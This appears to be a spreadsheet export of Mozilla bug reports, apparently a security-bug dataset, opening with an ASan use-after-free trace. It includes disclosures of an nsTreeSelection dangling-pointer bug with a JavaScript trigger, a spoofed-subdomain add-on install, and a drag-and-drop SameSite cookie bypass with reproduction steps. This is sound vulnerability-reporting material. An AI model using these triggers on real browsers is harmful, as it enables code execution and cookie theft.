    #25 0x7f5ea9b3b996 in Interpret(JSContext*, js::RunState&amp;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2944
    #26 0x7f5ea9b20a7b in js::RunScript(JSContext*, js::RunState&amp;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:394:12
    #27 0x7f5ea9b54c36 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:466:15
    #28 0x7f5ea9b55312 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:512:10
    #29 0x7f5eaa7c6ddc in js::Wrapper::call(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CallArgs const&amp;) const /home/worker/workspace/build/src/js/src/proxy/Wrapper.cpp:165:12
    #30 0x7f5eaa77d02e in js::CrossCompartmentWrapper::call(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CallArgs const&amp;) const /home/worker/workspace/build/src/js/src/proxy/CrossCompartmentWrapper.cpp:351:14
    #31 0x7f5eaa7a6899 in js::Proxy::call(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CallArgs const&amp;) /home/worker/workspace/build/src/js/src/proxy/Proxy.cpp:464:12
    #32 0x7f5eaa7a91c4 in js::proxy_Call(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/js/src/proxy/Proxy.cpp:716:12
    #33 0x7f5ea9b549c7 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:282:15
    #34 0x7f5ea9b549c7 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:436
    #35 0x7f5ea9b55312 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:512:10
    #36 0x7f5eaa52518c in JS::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::HandleValueArray const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/jsapi.cpp:2878:12
previously allocated by thread T0 (Web Content) here:
    #0 0x4b2e4b in malloc /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:52:3
    #1 0x4e11bd in moz_xmalloc /home/worker/workspace/build/src/memory/mozalloc/mozalloc.cpp:83:17
    #2 0x7f5ea491e780 in operator new /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/mozalloc.h:194:12
    #3 0x7f5ea491e780 in nsTextEditorState::BindToFrame(nsTextControlFrame*) /home/worker/workspace/build/src/dom/html/nsTextEditorState.cpp:1170
    #4 0x7f5ea6b4e6d4 in nsTextControlFrame::CreateAnonymousContent(nsTArray&lt;nsIAnonymousContentCreator::ContentInfo&gt;&amp;) /home/worker/workspace/build/src/layout/forms/nsTextControlFrame.cpp:332:17
    #5 0x7f5ea66aa1e7 in nsCSSFrameConstructor::GetAnonymousContent(nsIContent*, nsIFrame*, nsTArray&lt;nsIAnonymousContentCreator::ContentInfo&gt;&amp;) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:4207:17
    #6 0x7f5ea669e35d in nsCSSFrameConstructor::ProcessChildren(nsFrameConstructorState&amp;, nsIContent*, nsStyleContext*, nsContainerFrame*, bool, nsFrameItems&amp;, bool, PendingBinding*, nsIFrame*) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:10909:3
    #7 0x7f5ea66b327e in nsCSSFrameConstructor::ConstructFrameFromItemInternal(nsCSSFrameConstructor::FrameConstructionItem&amp;, nsFrameConstructorState&amp;, nsContainerFrame*, nsFrameItems&amp;) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:4062:9
    #8 0x7f5ea66be1f6 in nsCSSFrameConstructor::ConstructFramesFromItem(nsFrameConstructorState&amp;, nsCSSFrameConstructor::FrameConstructionItemList::Iterator&amp;, nsContainerFrame*, nsFrameItems&amp;) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:6209:3
    #9 0x7f5ea66cc5eb in ConstructFramesFromItemList /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:10705:5
    #10 0x7f5ea66cc5eb in nsCSSFrameConstructor::ContentAppended(nsIContent*, nsIContent*, bool) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:7564
    #11 0x7f5ea66c6eb8 in nsCSSFrameConstructor::CreateNeededFrames(nsIContent*) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:7183:5
    #12 0x7f5ea65db932 in mozilla::GeckoRestyleManager::ProcessPendingRestyles() /home/worker/workspace/build/src/layout/base/GeckoRestyleManager.cpp:464:3
    #13 0x7f5ea66272a0 in ProcessPendingRestyles /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/RestyleManagerInlines.h:44:3
    #14 0x7f5ea66272a0 in mozilla::PresShell::DoFlushPendingNotifications(mozilla::ChangesToFlush) /home/worker/workspace/build/src/layout/base/PresShell.cpp:4137
    #15 0x7f5ea26da88e in FlushPendingNotifications /home/worker/workspace/build/src/obj-firefox/dist/include/nsIPresShell.h:598:5
    #16 0x7f5ea26da88e in nsDocument::FlushPendingNotifications(mozilla::FlushType) /home/worker/workspace/build/src/dom/base/nsDocument.cpp:7961
    #17 0x7f5ea2722e9e in nsFocusManager::CheckIfFocusable(nsIContent*, unsigned int) /home/worker/workspace/build/src/dom/base/nsFocusManager.cpp:1550:3
    #18 0x7f5ea271f53c in nsFocusManager::SetFocusInner(nsIContent*, int, bool, bool) /home/worker/workspace/build/src/dom/base/nsFocusManager.cpp:1180:41
    #19 0x7f5ea27228de in nsFocusManager::SetFocus(nsIDOMElement*, unsigned int) /home/worker/workspace/build/src/dom/base/nsFocusManager.cpp:484:3
    #20 0x7f5ea24afb8f in mozilla::dom::Element::Focus(mozilla::ErrorResult&amp;) /home/worker/workspace/build/src/dom/base/Element.cpp:311:14
    #21 0x7f5ea3dbda38 in mozilla::dom::HTMLElementBinding::focus(JSContext*, JS::Handle&lt;JSObject*&gt;, nsGenericHTMLElement*, JSJitMethodCallArgs const&amp;) /home/worker/workspace/build/src/obj-firefox/dom/bindings/HTMLElementBinding.cpp:462:3
    #22 0x7f5ea4062047 in mozilla::dom::GenericBindingMethod(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:2953:13
    #23 0x7f5ea9b5491f in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:282:15
    #24 0x7f5ea9b5491f in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:448
    #25 0x7f5ea9b55312 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:512:10
    #26 0x7f5eaa7c6ddc in js::Wrapper::call(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CallArgs const&amp;) const /home/worker/workspace/build/src/js/src/proxy/Wrapper.cpp:165:12
    #27 0x7f5eaa77d02e in js::CrossCompartmentWrapper::call(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CallArgs const&amp;) const /home/worker/workspace/build/src/js/src/proxy/CrossCompartmentWrapper.cpp:351:14
    #28 0x7f5eaa7a6899 in js::Proxy::call(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CallArgs const&amp;) /home/worker/workspace/build/src/js/src/proxy/Proxy.cpp:464:12
    #29 0x7f5eaa7a91c4 in js::proxy_Call(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/js/src/proxy/Proxy.cpp:716:12
    #30 0x7f5ea9b549c7 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:282:15
    #31 0x7f5ea9b549c7 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:436
    #32 0x7f5ea9b3b996 in CallFromStack /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:499:12
    #33 0x7f5ea9b3b996 in Interpret(JSContext*, js::RunState&amp;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2944
    #34 0x7f5ea9b20a7b in js::RunScript(JSContext*, js::RunState&amp;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:394:12
    #35 0x7f5ea9b54c36 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:466:15
    #36 0x7f5ea9b55312 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:512:10
SUMMARY: AddressSanitizer: heap-use-after-free /home/worker/workspace/build/src/layout/generic/nsSelection.cpp:2224:8 in nsFrameSelection::PhysicalMove(short, short, bool)
Shadow bytes around the buggy address:
  0x0c2280059480: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fa
  0x0c2280059490: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd
  0x0c22800594a0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c22800594b0: fd fd fd fd fd fd fd fa fa fa fa fa fa fa fa fa
  0x0c22800594c0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
=&gt;0x0c22800594d0: fd fd fd fd fd fd fd[fd]fd fd fd fd fd fa fa fa
  0x0c22800594e0: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
  0x0c22800594f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c2280059500: 00 fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c2280059510: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c228005952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7885==ABORTING</t>
        </is>
      </c>
      <c r="X3276" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3277">
      <c r="A3277" t="n">
        <v>654827</v>
      </c>
      <c r="B3277" t="inlineStr">
        <is>
          <t>2011-05-04 13:55:19 -0700</t>
        </is>
      </c>
      <c r="C3277" t="inlineStr">
        <is>
          <t>Article preview is broken</t>
        </is>
      </c>
      <c r="D3277" t="inlineStr">
        <is>
          <t>2011-05-16 12:56:28 -0700</t>
        </is>
      </c>
      <c r="E3277" t="n">
        <v>1</v>
      </c>
      <c r="F3277" t="n">
        <v>1</v>
      </c>
      <c r="G3277" t="n">
        <v>5</v>
      </c>
      <c r="H3277" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I3277" t="inlineStr">
        <is>
          <t>support.mozilla.org</t>
        </is>
      </c>
      <c r="J3277" t="inlineStr">
        <is>
          <t>Knowledge Base Software</t>
        </is>
      </c>
      <c r="K3277" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3277" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3277" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3277" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3277" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3277" t="inlineStr"/>
      <c r="Q3277" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3277" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S3277" t="inlineStr">
        <is>
          <t>2.8.2</t>
        </is>
      </c>
      <c r="T3277" t="n">
        <v>1</v>
      </c>
      <c r="U3277" t="n">
        <v>0</v>
      </c>
      <c r="V3277" t="n">
        <v>4</v>
      </c>
      <c r="W3277" t="inlineStr">
        <is>
          <t>I think this is a CSRF issue, but previewing KB article edits doesn't work right now.</t>
        </is>
      </c>
      <c r="X3277" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3278">
      <c r="A3278" t="n">
        <v>571106</v>
      </c>
      <c r="B3278" t="inlineStr">
        <is>
          <t>2010-06-09 15:12:54 -0700</t>
        </is>
      </c>
      <c r="C3278" t="inlineStr">
        <is>
          <t>nsTreeSelection Dangling Pointer Remote Code Execution Vulnerability (ZDI-CAN-755)</t>
        </is>
      </c>
      <c r="D3278" t="inlineStr">
        <is>
          <t>2010-09-27 18:05:55 -0700</t>
        </is>
      </c>
      <c r="E3278" t="n">
        <v>1</v>
      </c>
      <c r="F3278" t="n">
        <v>1</v>
      </c>
      <c r="G3278" t="n">
        <v>3</v>
      </c>
      <c r="H3278" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3278" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3278" t="inlineStr">
        <is>
          <t>XUL</t>
        </is>
      </c>
      <c r="K3278" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3278" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3278" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3278" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3278" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3278" t="inlineStr">
        <is>
          <t>[sg:critical?][critsmash:patch]</t>
        </is>
      </c>
      <c r="Q3278" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3278" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3278" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3278" t="n">
        <v>1</v>
      </c>
      <c r="U3278" t="n">
        <v>0</v>
      </c>
      <c r="V3278" t="n">
        <v>17</v>
      </c>
      <c r="W3278" t="inlineStr">
        <is>
          <t>Created attachment 450220
XUL testcase
ZDI-CAN-755: Mozilla Firefox nsTreeSelection Dangling Pointer Remote Code Execution Vulnerability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implementation of XUL &lt;tree&gt;
element's "selection" attribute. There is an integer overflow when
calculating the bounds of a new selection range. When calling
adjustSelection on this manged range both ranges are deleted leaving a
dangling reference. A remote attacker can exploit this vulnerability to
execute arbitrary code under the context of the browser.
View of XUL &lt;tree&gt; element exposes "selection" attribute. This in turn
allows user to precisely choose set of tree's rows to be shown as
selected. The way class nsTreeSelection
(layout/xul/base/src/tree/src/nsTreeSelection.cpp) is implemented is
quite interesting: with a linked list of nsTreeRange instances where
nsTreeRange represents single continuous range of selected rows (and
possibly a pointer to the next range). nsTreeSelection holds directly
only one pointer, to the first range, mFirstRange.
What is also important to note: whenever any nsTreeRange instance is
deleted, delete (inside destructor) is called recursively on the next
linked instances as well.
Imagine we have the following piece of Javascript code:
  [1]  sel = tree.treeBoxObject.view.selection;
  [2]  sel.rangedSelect(0, 0x7fffffff, true);
  [3]  sel.adjustSelection(1, 1);
At [1] we grab the reference to selection object. At this moment
mFirstRange is null, no row is selected, so there is no need for any
range to keep track of.
Then [2] we call method rangedSelect(). From
nsTreeSelection::RangedSelect():
  ...
  PRInt32 start = aStartIndex &lt; aEndIndex ? aStartIndex : aEndIndex;
  PRInt32 end = aStartIndex &lt; aEndIndex ? aEndIndex : aStartIndex;
  ...
  nsTreeRange* range = new nsTreeRange(this, start, end);
  if (!range)
    return NS_ERROR_OUT_OF_MEMORY;
  range-&gt;Invalidate();
  if (aAugment &amp;&amp; mFirstRange)
    mFirstRange-&gt;Insert(range);
  else
    mFirstRange = range;
  ...
That makes mFirstRange being set to range &lt;0, 2G&gt;, or more precisely
(yet in ad hoc pseudo code):
  mFirstRange = {
    min:  0,
    max:  2G,
    prev: null,
    next: null
  }
And at [3] we hit integer overflow that causes a lot of trouble. From
nsTreeSelection::AdjustSelection(PRInt32 aIndex, PRInt32 aCount):
  ...
  nsTreeRange* newRange = nsnull;
  PRBool selChanged = PR_FALSE;
  nsTreeRange* curr = mFirstRange;
  while (curr) {
    if (aCount &gt; 0) {
      // inserting
      if (aIndex &gt; curr-&gt;mMax) {
        ...
      }
      else if (aIndex &lt;= curr-&gt;mMin) {
        ...
      }
      else {
        // adjustment happen inside the range.
        // break apart the range and create two ranges
        ADD_NEW_RANGE(newRange, this, curr-&gt;mMin, aIndex - 1);
        ADD_NEW_RANGE(newRange, this, aIndex + aCount, curr-&gt;mMax +
aCount);
        selChanged = PR_TRUE;
      }
    }
    else {
      ...
    }
    curr = curr-&gt;mNext;
  }
  delete mFirstRange;
  mFirstRange = newRange;
  ...
As we are calling AdjustSelection(1, 1), two ADD_NEW_RANGE() are
executed.
This means that something like &lt;0, 0&gt;.Insert(&lt;2, -2G&gt;) will be called.
Notice that because of integer overflow lower bound (2) is above higher
bound (-2G).
  void Insert(nsTreeRange* aRange) {
    if (mMin &gt;= aRange-&gt;mMax)
      aRange-&gt;Connect(mPrev, this);
    else if (mNext)
      mNext-&gt;Insert(aRange);
    else 
      aRange-&gt;Connect(this, nsnull);
  }
So, now &lt;2, -2G&gt;.Connect(mPrev = null, &lt;0, 0&gt;):
  void Connect(nsTreeRange* aPrev = nsnull, nsTreeRange* aNext = nsnull)
{
    if (aPrev)
      aPrev-&gt;mNext = this;
    else
      mSelection-&gt;mFirstRange = this;
    if (aNext)
      aNext-&gt;mPrev = this;
    mPrev = aPrev;
    mNext = aNext;
  }
Which results in:
  mFirstRange = {
    min:  2,
    max:  -2G,
    prev: null,
    next: {
      min:  0,
      max:  0,
      prev: mFirstRange,
      next: null
    }
  }
But we can not forget about the epilogue of AdjustSelection():
  delete mFirstRange;
  mFirstRange = newRange;
Final result: both ranges (&lt;2, -2G&gt;, &lt;0, 0&gt;) are deleted and mFirstRange
points at deleted range &lt;0, 0&gt;.
-- CREDIT --------------------------------------------------------------
This vulnerability was discovered by:
    * regenrecht</t>
        </is>
      </c>
      <c r="X3278" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3279">
      <c r="A3279" t="n">
        <v>1128126</v>
      </c>
      <c r="B3279" t="inlineStr">
        <is>
          <t>2015-01-30 19:14:17 -0800</t>
        </is>
      </c>
      <c r="C3279" t="inlineStr">
        <is>
          <t>Addon permissions exposed to man-in-the-middle attacks</t>
        </is>
      </c>
      <c r="D3279" t="inlineStr">
        <is>
          <t>2024-05-30 08:39:43 -0700</t>
        </is>
      </c>
      <c r="E3279" t="n">
        <v>1</v>
      </c>
      <c r="F3279" t="n">
        <v>1</v>
      </c>
      <c r="G3279" t="n">
        <v>3</v>
      </c>
      <c r="H3279" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3279" t="inlineStr">
        <is>
          <t>Toolkit</t>
        </is>
      </c>
      <c r="J3279" t="inlineStr">
        <is>
          <t>Add-ons Manager</t>
        </is>
      </c>
      <c r="K3279" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3279" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3279" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3279" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3279" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3279" t="inlineStr">
        <is>
          <t>[adv-main37+]</t>
        </is>
      </c>
      <c r="Q3279" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3279" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3279" t="inlineStr">
        <is>
          <t>mozilla38</t>
        </is>
      </c>
      <c r="T3279" t="n">
        <v>1</v>
      </c>
      <c r="U3279" t="n">
        <v>0</v>
      </c>
      <c r="V3279" t="n">
        <v>48</v>
      </c>
      <c r="W3279" t="inlineStr">
        <is>
          <t>Created attachment 8557436
test case which installs a theme on page load
Firefox exposes Addon management permissions to a man in the middle, possibly
due to broken Public Key Pinning.
Extended browser access is granted to some Mozilla-owned domains, such as addon
management for addons.mozilla.org, wich is defined by the default_permissions
file, as I understood it.
But unlike the "UITour" permissions granted for www.mozilla.org, this API is
not restricted to the https:// protocol.
This should not be a security risk per se, since addons.mozilla.org provides
HSTS headers and is included in the static HPKP pinning list anyways, which
should render any attempt to tamper with plain HTTP traffic impossible.
Nevertheless sub-subdomains do not seem to enforce SSL here.
So a MITM can spoof the DNS entry for http://evil.addons.mozilla.org/ and from
there still act with the same privileges as https://addons.mozilla.org/.
Reproduction:
  - Set up a local web server together with a host entry like:
    127.0.0.1   evil.addons.mozilla.org
  - Perform operations, which require the access level of the AMO domain.
  - You can load the attached test case as a proof of concept, which installs a
    harmless theme.
  Observation:
  - http://localhost/install_theme.html
    -&gt; Warning message: "This site (localhost) attempted to install a theme."
  - http://evil.addons.mozilla.org/install_theme.html
    -&gt; The theme will be installed on page load without any user confirmation.</t>
        </is>
      </c>
      <c r="X3279" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3280">
      <c r="A3280" t="n">
        <v>1138669</v>
      </c>
      <c r="B3280" t="inlineStr">
        <is>
          <t>2015-03-02 13:32:57 -0800</t>
        </is>
      </c>
      <c r="C3280" t="inlineStr">
        <is>
          <t>Some mac crash reports include private information</t>
        </is>
      </c>
      <c r="D3280" t="inlineStr">
        <is>
          <t>2015-07-06 15:14:02 -0700</t>
        </is>
      </c>
      <c r="E3280" t="n">
        <v>1</v>
      </c>
      <c r="F3280" t="n">
        <v>1</v>
      </c>
      <c r="G3280" t="n">
        <v>3</v>
      </c>
      <c r="H3280" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3280" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3280" t="inlineStr">
        <is>
          <t>Widget: Cocoa</t>
        </is>
      </c>
      <c r="K3280" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3280" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M3280" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N3280" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3280" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3280" t="inlineStr">
        <is>
          <t>[adv-main39+]</t>
        </is>
      </c>
      <c r="Q3280" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3280" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3280" t="inlineStr">
        <is>
          <t>mozilla39</t>
        </is>
      </c>
      <c r="T3280" t="n">
        <v>1</v>
      </c>
      <c r="U3280" t="n">
        <v>0</v>
      </c>
      <c r="V3280" t="n">
        <v>14</v>
      </c>
      <c r="W3280" t="inlineStr">
        <is>
          <t>I'm working on bug 1124408 and the crash reports I'm viewing contain private information.  The bug is about a crash when using some password fields (like the password manager).  In the crash report, actual keys that the user pressed when they got the crash are plainly visible.  For example:
https://crash-stats.mozilla.com/report/index/5f846d1b-cff1-455d-86dc-6dd4e2150301
From the AppNotes section, I can see that this user has a 'k' in their password.  This information is valuable to the bug but also clearly private.  I don't know the policy here but I suspect this info should be removed from the report.
The message is logged from the Cocoa widget object.</t>
        </is>
      </c>
      <c r="X3280" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3281">
      <c r="A3281" t="n">
        <v>1794268</v>
      </c>
      <c r="B3281" t="inlineStr">
        <is>
          <t>2022-10-08 10:58:34 -0700</t>
        </is>
      </c>
      <c r="C3281" t="inlineStr">
        <is>
          <t>Drag-and-drop of a URL from inside a cross-origin iframe should not be allowed to drop in the same tab (cross-origin attacks and spoofs)</t>
        </is>
      </c>
      <c r="D3281" t="inlineStr">
        <is>
          <t>2024-05-30 11:01:24 -0700</t>
        </is>
      </c>
      <c r="E3281" t="n">
        <v>1</v>
      </c>
      <c r="F3281" t="n">
        <v>1</v>
      </c>
      <c r="G3281" t="n">
        <v>3</v>
      </c>
      <c r="H3281" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3281" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3281" t="inlineStr">
        <is>
          <t>DOM: Copy &amp; Paste and Drag &amp; Drop</t>
        </is>
      </c>
      <c r="K3281" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3281" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3281" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3281" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3281" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3281" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form] [verif?][post-critsmash-triage][adv-main109+][adv-esr102.7+]</t>
        </is>
      </c>
      <c r="Q3281" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3281" t="inlineStr">
        <is>
          <t>S2</t>
        </is>
      </c>
      <c r="S3281" t="inlineStr">
        <is>
          <t>109 Branch</t>
        </is>
      </c>
      <c r="T3281" t="n">
        <v>1</v>
      </c>
      <c r="U3281" t="n">
        <v>0</v>
      </c>
      <c r="V3281" t="n">
        <v>24</v>
      </c>
      <c r="W3281" t="inlineStr">
        <is>
          <t>Created attachment 9297700
index.html
I was testing and comparing the drag-and-drop functionality between browsers and noticed an odd behavior:
1. If a user performs a drag of a URL from inside a same-origin iframe and drops it outside of the iframe, no navigation is performed.
2. If a user performs a drag of a URL from inside a cross-origin iframe and drops it outside of the iframe, a navigation is performed.
This navigation ends up sending all the user's cookies in the request (Lax, Strict, and None), which defeats the purpose of SameSite Cookies on Strict mode for GET requests as this turns all drag-and-drops into potentially untrustworthy actions.
Note that no navigation is made on Google Chrome and Safari.
I have also attached a video reproducing the attack.
VERSION
Version: 105.0 (64-bit).
Operating System: Ubuntu 20.04
REPRODUCTION CASE
1. Download "index.html" and serve the file through a web server.
2. Access https://lbherrera.github.io/lab/setCookies.html to set different SameSite Cookies on the victim's page (Lax, Strict, and None).
3. Access http://localhost/index.html
4. Try to scroll the page down by dragging the scroll bar and then drop it.
5. You will be redirected to https://lbherrera.github.io/lab/getCookies.html and it will display which cookies it received (Lax=true; Strict=true; None=true).
CREDIT INFORMATION
Reporter credit: Luan Herrera (@lbherrera_)</t>
        </is>
      </c>
      <c r="X3281" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3282">
      <c r="A3282" t="n">
        <v>93481</v>
      </c>
      <c r="B3282" t="inlineStr">
        <is>
          <t>2001-08-03 11:32:49 -0700</t>
        </is>
      </c>
      <c r="C3282" t="inlineStr">
        <is>
          <t>multipart/alternative doesn't show up</t>
        </is>
      </c>
      <c r="D3282" t="inlineStr">
        <is>
          <t>2008-07-31 01:23:32 -0700</t>
        </is>
      </c>
      <c r="E3282" t="n">
        <v>1</v>
      </c>
      <c r="F3282" t="n">
        <v>1</v>
      </c>
      <c r="G3282" t="n">
        <v>3</v>
      </c>
      <c r="H3282" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3282" t="inlineStr">
        <is>
          <t>MailNews Core</t>
        </is>
      </c>
      <c r="J3282" t="inlineStr">
        <is>
          <t>MIME</t>
        </is>
      </c>
      <c r="K3282" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3282" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M3282" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="N3282" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3282" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3282" t="inlineStr">
        <is>
          <t>have fix</t>
        </is>
      </c>
      <c r="Q3282" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3282" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S3282" t="inlineStr">
        <is>
          <t>mozilla0.9.8</t>
        </is>
      </c>
      <c r="T3282" t="n">
        <v>1</v>
      </c>
      <c r="U3282" t="n">
        <v>0</v>
      </c>
      <c r="V3282" t="n">
        <v>25</v>
      </c>
      <c r="W3282" t="inlineStr">
        <is>
          <t>I've received several messages with are produced by:
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200
that doesn't show up in the mail view.</t>
        </is>
      </c>
      <c r="X3282" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3283">
      <c r="A3283" t="n">
        <v>785619</v>
      </c>
      <c r="B3283" t="inlineStr">
        <is>
          <t>2012-08-25 06:09:19 -0700</t>
        </is>
      </c>
      <c r="C3283" t="inlineStr">
        <is>
          <t>Update verify fails for ESR releases</t>
        </is>
      </c>
      <c r="D3283" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:47 -0700</t>
        </is>
      </c>
      <c r="E3283" t="n">
        <v>1</v>
      </c>
      <c r="F3283" t="n">
        <v>1</v>
      </c>
      <c r="G3283" t="n">
